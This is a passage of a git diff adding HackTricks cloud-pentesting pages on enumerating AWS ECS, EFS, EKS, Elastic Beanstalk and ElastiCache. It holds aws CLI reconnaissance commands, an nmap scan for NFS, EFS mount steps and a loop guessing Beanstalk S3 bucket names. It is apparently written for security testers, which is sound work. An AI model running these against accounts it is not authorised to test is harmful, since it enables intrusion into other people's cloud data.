+### Sensitive Data In Task Definitions
+
+Task definitions are responsible for **configuring the actual containers that will be running in ECS**. Since task definitions define how containers will run, a plethora of information can be found within.
+
+Pacu can enumerate ECS (list-clusters, list-container-instances, list-services, list-task-definitions), it can also dump task definitions.
+
+### Enumeration
+
+```bash
+# Clusters info
+aws ecs list-clusters
+aws ecs describe-clusters --clusters <cluster>
+
+# Container instances
+## An Amazon ECS container instance is an Amazon EC2 instance that is running the Amazon ECS container agent and has been registered into an Amazon ECS cluster.
+aws ecs list-container-instances --cluster <cluster>
+aws ecs describe-container-instances --cluster <cluster> --container-instances <container_instance_arn>
+
+# Services info
+aws ecs list-services --cluster <cluster>
+aws ecs describe-services --cluster <cluster> --services <services>
+aws ecs describe-task-sets --cluster <cluster> --service <service>
+
+# Task definitions
+aws ecs list-task-definition-families
+aws ecs list-task-definitions
+aws ecs list-tasks --cluster <cluster>
+aws ecs describe-tasks --cluster <cluster> --tasks <tasks>
+## Look for env vars and secrets used from the task definition
+aws ecs describe-task-definition --task-definition <TASK_NAME>:<VERSION>
+```
+
+### Unauthenticated Access
+
+{% content-ref url="../aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md" %}
+[aws-ecs-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md)
+{% endcontent-ref %}
+
+### Privesc
+
+In the following page you can check how to **abuse ECS permissions to escalate privileges**:
+
+{% content-ref url="../aws-privilege-escalation/aws-ecs-privesc.md" %}
+[aws-ecs-privesc.md](../aws-privilege-escalation/aws-ecs-privesc.md)
+{% endcontent-ref %}
+
+### Post Exploitation
+
+{% content-ref url="../aws-post-exploitation/aws-ecs-post-exploitation.md" %}
+[aws-ecs-post-exploitation.md](../aws-post-exploitation/aws-ecs-post-exploitation.md)
+{% endcontent-ref %}
+
+### Persistence
+
+{% content-ref url="../aws-persistence/aws-ecs-persistence.md" %}
+[aws-ecs-persistence.md](../aws-persistence/aws-ecs-persistence.md)
+{% endcontent-ref %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-efs-enum.md b/pentesting-cloud/aws-security/aws-services/aws-efs-enum.md
new file mode 100644
index 0000000000..75d6aad445
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-efs-enum.md
@@ -0,0 +1,174 @@
+# AWS - EFS Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## EFS
+
+### Basic Information
+
+Amazon Elastic File System (EFS) is presented as a **fully managed, scalable, and elastic network file system** by AWS. The service facilitates the creation and configuration of **file systems** that can be concurrently accessed by multiple EC2 instances and other AWS services. The key features of EFS include its ability to automatically scale without manual intervention, provision low-latency access, support high-throughput workloads, guarantee data durability, and seamlessly integrate with various AWS security mechanisms.
+
+By **default**, the EFS folder to mount will be **`/`** but it could have a **different name**.
+
+### Network Access
+
+An EFS is created in a VPC and would be **by default accessible in all the VPC subnetworks**. However, the EFS will have a Security Group. In order to **give access to an EC2** (or any other AWS service) to mount the EFS, it’s needed to **allow in the EFS security group an inbound NFS** (2049 port) **rule from the EC2 Security Group**.
+
+Without this, you **won't be able to contact the NFS service**.
+
+For more information about how to do this check: [https://stackoverflow.com/questions/38632222/aws-efs-connection-timeout-at-mount](https://stackoverflow.com/questions/38632222/aws-efs-connection-timeout-at-mount)
+
+### Enumeration
+
+```bash
+# Get filesystems and access policies (if any)
+aws efs describe-file-systems
+aws efs describe-file-system-policy --file-system-id <id>
+
+# Get subnetworks and IP addresses where you can find the file system
+aws efs describe-mount-targets --file-system-id <id>
+aws efs describe-mount-target-security-groups --mount-target-id <id>
+aws ec2 describe-security-groups --group-ids <sg_id>
+
+# Get other access points
+aws efs describe-access-points
+
+# Get replication configurations
+aws efs describe-replication-configurations
+
+# Search for NFS in EC2 networks
+sudo nmap -T4 -Pn -p 2049 --open 10.10.10.0/20 # or /16 to be sure
+```
+
+{% hint style="danger" %}
+It might be that the EFS mount point is inside the same VPC but in a different subnet. If you want to be sure you find all **EFS points it would be better to scan the `/16` netmask**.
+{% endhint %}
+
+### Mount EFS
+
+{% code overflow="wrap" %}
+```bash
+sudo mkdir /efs
+
+## Mount found
+sudo apt install nfs-common
+sudo mount -t nfs4 -o nfsvers=4.1,rsize=1048576,wsize=1048576,hard,timeo=600,retrans=2,noresvport <IP>:/ /efs
+
+## Mount with efs type
+## You need to have installed the package amazon-efs-utils
+sudo yum install amazon-efs-utils # If centos
+sudo apt-get install amazon-efs-utils # If ubuntu
+sudo mount -t efs <file-system-id/EFS DNS name>:/ /efs/
+```
+{% endcode %}
+
+### IAM Access
+
+By **default** anyone with **network access to the EFS** will be able to mount, **read and write it even as root user**. However, File System policies could be in place **only allowing principals with specific permissions** to access it.\
+For example, this File System policy **won't allow even to mount** the file system if you **don't have the IAM permission**:
+
+```json
+{
+    "Version": "2012-10-17",
+    "Id": "efs-policy-wizard-2ca2ba76-5d83-40be-8557-8f6c19eaa797",
+    "Statement": [
+        {
+            "Sid": "efs-statement-e7f4b04c-ad75-4a7f-a316-4e5d12f0dbf5",
+            "Effect": "Allow",
+            "Principal": {
+                "AWS": "*"
+            },
+            "Action": "",
+            "Resource": "arn:aws:elasticfilesystem:us-east-1:318142138553:file-system/fs-0ab66ad201b58a018",
+            "Condition": {
+                "Bool": {
+                    "elasticfilesystem:AccessedViaMountTarget": "true"
+                }
+            }
+        }
+    ]
+}
+```
+
+Or this will **prevent anonymous access**:
+
+<figure><img src="../../../.gitbook/assets/image (278).png" alt=""><figcaption></figcaption></figure>
+
+Note that to mount file systems protected by IAM you MUST use the type "efs" in the mount command:
+
+```bash
+sudo mkdir /efs
+sudo mount -t efs -o tls,iam  <file-system-id/EFS DNS name>:/ /efs/
+# To use a different pforile from ~/.aws/credentials
+# You can use: -o tls,iam,awsprofile=namedprofile
+```
+
+### Access Points
+
+**Access points** are **application**-specific entry points **into an EFS file system** that make it easier to manage application access to shared datasets.
+
+When you create an access point, you can **specify the owner and POSIX permissions** for the files and directories created through the access point. You can also **define a custom root directory** for the access point, either by specifying an existing directory or by creating a new one with the desired permissions. This allows you to **control access to your EFS file system on a per-application or per-user basis**, making it easier to manage and secure your shared file data.
+
+**You can mount the File System from an access point with something like:**
+
+```bash
+# Use IAM if you need to use iam permissions
+sudo mount -t efs -o tls,[iam],accesspoint=<access-point-id> \
+    <file-system-id/EFS DNS> /efs/
+```
+
+{% hint style="warning" %}
+Note that even trying to mount an access point you still need to be able to **contact the NFS service via network**, and if the EFS has a file system **policy**, you need **enough IAM permissions** to mount it.
+{% endhint %}
+
+Access points can be used for the following purposes:
+
+* **Simplify permissions management**: By defining a POSIX user and group for each access point, you can easily manage access permissions for different applications or users without modifying the underlying file system's permissions.
+* **Enforce a root directory**: Access points can restrict access to a specific directory within the EFS file system, ensuring that each application or user operates within its designated folder. This helps prevent accidental data exposure or modification.
+* **Easier file system access**: Access points can be associated with an AWS Lambda function or an AWS Fargate task, simplifying file system access for serverless and containerized applications.
+
+## Privesc
+
+{% content-ref url="../aws-privilege-escalation/aws-efs-privesc.md" %}
+[aws-efs-privesc.md](../aws-privilege-escalation/aws-efs-privesc.md)
+{% endcontent-ref %}
+
+## Post Exploitation
+
+{% content-ref url="../aws-post-exploitation/aws-efs-post-exploitation.md" %}
+[aws-efs-post-exploitation.md](../aws-post-exploitation/aws-efs-post-exploitation.md)
+{% endcontent-ref %}
+
+## Persistence
+
+{% content-ref url="../aws-persistence/aws-efs-persistence.md" %}
+[aws-efs-persistence.md](../aws-persistence/aws-efs-persistence.md)
+{% endcontent-ref %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-eks-enum.md b/pentesting-cloud/aws-security/aws-services/aws-eks-enum.md
new file mode 100644
index 0000000000..b99caa6833
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-eks-enum.md
@@ -0,0 +1,72 @@
+# AWS - EKS Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## EKS
+
+Amazon Elastic Kubernetes Service (Amazon EKS) is designed to eliminate the need for users to install, operate, and manage their own Kubernetes control plane or nodes. Instead, Amazon EKS manages these components, providing a simplified way to deploy, manage, and scale containerized applications using Kubernetes on AWS.
+
+Key aspects of Amazon EKS include:
+
+1. **Managed Kubernetes Control Plane**: Amazon EKS automates critical tasks such as patching, node provisioning, and updates.
+2. **Integration with AWS Services**: It offers seamless integration with AWS services for compute, storage, database, and security.
+3. **Scalability and Security**: Amazon EKS is designed to be highly available and secure, providing features such as automatic scaling and isolation by design.
+4. **Compatibility with Kubernetes**: Applications running on Amazon EKS are fully compatible with applications running on any standard Kubernetes environment.
+
+#### Enumeration
+
+```bash
+aws eks list-clusters
+aws eks describe-cluster --name <cluster_name>
+# Check for endpointPublicAccess and publicAccessCidrs
+
+aws eks list-fargate-profiles --cluster-name <cluster_name>
+aws eks describe-fargate-profile --cluster-name <cluster_name> --fargate-profile-name <prof_name>
+
+aws eks list-identity-provider-configs --cluster-name <cluster_name>
+aws eks describe-identity-provider-config --cluster-name <cluster_name> --identity-provider-config <p_config>
+
+aws eks list-nodegroups --cluster-name <c_name>
+aws eks describe-nodegroup --cluster-name <c_name> --nodegroup-name <n_name>
+
+aws eks list-updates --name <name>
+aws eks describe-update --name <name> --update-id <id>
+```
+
+#### Post Exploitation
+
+{% content-ref url="../aws-post-exploitation/aws-eks-post-exploitation.md" %}
+[aws-eks-post-exploitation.md](../aws-post-exploitation/aws-eks-post-exploitation.md)
+{% endcontent-ref %}
+
+## References
+
+* [https://aws.amazon.com/eks/](https://aws.amazon.com/eks/)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.md b/pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.md
new file mode 100644
index 0000000000..a2440c8d39
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.md
@@ -0,0 +1,142 @@
+# AWS - Elastic Beanstalk Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Elastic Beanstalk
+
+Amazon Elastic Beanstalk provides a simplified platform for **deploying, managing, and scaling web applications and services**. It supports a variety of programming languages and frameworks, such as Java, .NET, PHP, Node.js, Python, Ruby, and Go, as well as Docker containers. The service is compatible with widely-used servers including Apache, Nginx, Passenger, and IIS.
+
+Elastic Beanstalk provides a simple and flexible way to **deploy your applications to the AWS cloud**, without the need to worry about the underlying infrastructure. It **automatically** handles the details of capacity **provisioning**, load **balancing**, **scaling**, and application health **monitoring**, allowing you to focus on writing and deploying your code.
+
+The infrastructure created by Elastic Beanstalk is managed by **Autoscaling** Groups in **EC2** (with a load balancer). Which means that at the end of the day, if you **compromise the host**, you should know about about EC2:
+
+{% content-ref url="aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/" %}
+[aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum](aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/)
+{% endcontent-ref %}
+
+Moreover, if Docker is used, it’s possible to use **ECS**.
+
+{% content-ref url="aws-eks-enum.md" %}
+[aws-eks-enum.md](aws-eks-enum.md)
+{% endcontent-ref %}
+
+### Application & Environments
+
+In AWS Elastic Beanstalk, the concepts of an "application" and an "environment" serve different purposes and have distinct roles in the deployment process.
+
+#### Application
+
+* An application in Elastic Beanstalk is a **logical container for your application's source code, environments, and configurations**. It groups together different versions of your application code and allows you to manage them as a single entity.
+* When you create an application, you provide a name and **description, but no resources are provisioned** at this stage. it is simply a way to organize and manage your code and related resources.
+* You can have **multiple application versions** within an application. Each version corresponds to a specific release of your code, which can be deployed to one or more environments.
+
+#### Environment
+
+* An environment is a **provisioned instance of your application** running on AWS infrastructure. It is **where your application code is deployed and executed**. Elastic Beanstalk provisions the necessary resources (e.g., EC2 instances, load balancers, auto-scaling groups, databases) based on the environment configuration.
+* **Each environment runs a single version of your application**, and you can have multiple environments for different purposes, such as development, testing, staging, and production.
+* When you create an environment, you choose a platform (e.g., Java, .NET, Node.js, etc.) and an environment type (e.g., web server or worker). You can also customize the environment configuration to control various aspects of the infrastructure and application settings.
+
+### 2 types of Environments
+
+1. **Web Server Environment**: It is designed to **host and serve web applications and APIs**. These applications typically handle incoming HTTP/HTTPS requests. The web server environment provisions resources such as **EC2 instances, load balancers, and auto-scaling** groups to handle incoming traffic, manage capacity, and ensure the application's high availability.
+2. **Worker Environment**: It is designed to process **background tasks**, which are often time-consuming or resource-intensive operations that don't require immediate responses to clients. The worker environment provisions resources like **EC2 instances and auto-scaling groups**, but it **doesn't have a load balancer** since it doesn't handle HTTP/HTTPS requests directly. Instead, it consumes tasks from an **Amazon Simple Queue Service (SQS) queue**, which acts as a buffer between the worker environment and the tasks it processes.
+
+### Security
+
+When creating an App in Beanstalk there are 3 very important security options to choose:
+
+* **EC2 key pair**: This will be the **SSH key** that will be able to access the EC2 instances running the app
+* **IAM instance profile**: This is the **instance profile** that the instances will have (**IAM privileges**)
+  * The autogenerated role is called **`aws-elasticbeanstalk-ec2-role`** and has some interesting access over all ECS, all SQS, DynamoDB elasticbeanstalk and elasticbeanstalk S3 using the AWS managed policies: [AWSElasticBeanstalkWebTier](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSElasticBeanstalkWebTier), [AWSElasticBeanstalkMulticontainerDocker](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSElasticBeanstalkMulticontainerDocker), [AWSElasticBeanstalkWorkerTier](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSElasticBeanstalkWorkerTier).
+* **Service role**: This is the **role that the AWS service** will use to perform all the needed actions. Afaik, a regular AWS user cannot access that role.
+  * This role generated by AWS is called **`aws-elasticbeanstalk-service-role`** and uses the AWS managed policies [AWSElasticBeanstalkEnhancedHealth](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/service-role/AWSElasticBeanstalkEnhancedHealth) and [AWSElasticBeanstalkManagedUpdatesCustomerRolePolicy](https://us-east-1.console.aws.amazon.com/iamv2/home?region=us-east-1#/roles/details/aws-elasticbeanstalk-service-role?section=permissions)
+
+By default **metadata version 1 is disabled**:
+
+<figure><img src="../../../.gitbook/assets/image (103).png" alt=""><figcaption></figcaption></figure>
+
+### Exposure
+
+Beanstalk data is stored in a **S3 bucket** with the following name: **`elasticbeanstalk-<region>-<acc-id>`**(if it was created in the AWS console). Inside this bucket you will find the uploaded **source code of the application**.
+
+The **URL** of the created webpage is **`http://<webapp-name>-env.<random>.<region>.elasticbeanstalk.com/`**
+
+{% hint style="warning" %}
+If you get **read access** over the bucket, you can **read the source code** and even find **sensitive credentials** on it
+
+if you get **write access** over the bucket, you could **modify the source code** to **compromise** the **IAM role** the application is using next time it's executed.
+{% endhint %}
+
+### Enumeration
+
+{% code overflow="wrap" %}
+```bash
+# Find S3 bucket
+ACCOUNT_NUMBER=<account_number>
+for r in us-east-1 us-east-2 us-west-1 us-west-2 ap-south-1 ap-south-2 ap-northeast-1 ap-northeast-2 ap-northeast-3 ap-southeast-1 ap-southeast-2 ap-southeast-3 ca-central-1 eu-central-1 eu-central-2 eu-west-1 eu-west-2 eu-west-3 eu-north-1 sa-east-1 af-south-1 ap-east-1 eu-south-1 eu-south-2 me-south-1 me-central-1; do aws s3 ls elasticbeanstalk-$r-$ACCOUNT_NUMBER 2>/dev/null && echo "Found in: elasticbeanstalk-$r-$ACCOUNT_NUMBER"; done
+
+# Get apps and URLs
+aws elasticbeanstalk describe-applications # List apps
+aws elasticbeanstalk describe-application-versions # Get apps & bucket name with source code
+aws elasticbeanstalk describe-environments # List envs
+aws elasticbeanstalk describe-environments | grep -E "EndpointURL|CNAME"
+aws elasticbeanstalk describe-configuration-settings --application-name <app_name> --environment-name <env_name>
+aws elasticbeanstalk describe-environment-resources --environment-name <env_name> # Get env info such as SQS used queues
+aws elasticbeanstalk describe-instances-health --environment-name <env_name> # Get the instances of an environment
+
+# Get events
+aws elasticbeanstalk describe-events
+```
+{% endcode %}
+
+### Unauthenticated Access
+
+{% content-ref url="../aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md" %}
+[aws-elastic-beanstalk-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md)
+{% endcontent-ref %}
+
+### Persistence
+
+{% content-ref url="../aws-persistence/aws-elastic-beanstalk-persistence.md" %}
+[aws-elastic-beanstalk-persistence.md](../aws-persistence/aws-elastic-beanstalk-persistence.md)
+{% endcontent-ref %}
+
+### Privesc
+
+{% content-ref url="../aws-privilege-escalation/aws-elastic-beanstalk-privesc.md" %}
+[aws-elastic-beanstalk-privesc.md](../aws-privilege-escalation/aws-elastic-beanstalk-privesc.md)
+{% endcontent-ref %}
+
+### Post Exploitation
+
+{% content-ref url="../aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md" %}
+[aws-elastic-beanstalk-post-exploitation.md](../aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md)
+{% endcontent-ref %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-elasticache.md b/pentesting-cloud/aws-security/aws-services/aws-elasticache.md
new file mode 100644
index 0000000000..8839a65982
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-elasticache.md
@@ -0,0 +1,71 @@
+# AWS - ElastiCache
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## ElastiCache
+
+AWS ElastiCache is a fully **managed in-memory data store and cache service** that provides high-performance, low-latency, and scalable solutions for applications. It supports two popular open-source in-memory engines: **Redis and Memcached**. ElastiCache **simplifies** the **setup**, **management**, and **maintenance** of these engines, allowing developers to offload time-consuming tasks such as provisioning, patching, monitoring, and **backups**.
+
+### Enumeration
+
+```bash
+# ElastiCache clusters
+## Check the SecurityGroups to later check who can access
+## In Redis clusters: Check AuthTokenEnabled to see if you need password
+## In memcache clusters: You can find the URL to connect
+aws elasticache describe-cache-clusters
+
+# List all ElastiCache replication groups
+## Find here the accesible URLs for Redis clusters
+aws elasticache describe-replication-groups
+
+#List all ElastiCache parameter groups
+aws elasticache describe-cache-parameter-groups
+
+#List all ElastiCache security groups
+## If this gives an error it's because it's using SGs from EC2
+aws elasticache describe-cache-security-groups
+
+#List all ElastiCache subnet groups
+aws elasticache describe-cache-subnet-groups
+
+# Get snapshots
+aws elasticache describe-snapshots
+
+# Get users and groups
+aws elasticache describe-user-groups
+aws elasticache describe-users
+
+# List ElastiCache events
+aws elasticache describe-events
+```
+
+### Privesc (TODO)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-emr-enum.md b/pentesting-cloud/aws-security/aws-services/aws-emr-enum.md
new file mode 100644
index 0000000000..be430d0552
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-services/aws-emr-enum.md
@@ -0,0 +1,86 @@
+# AWS - EMR Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
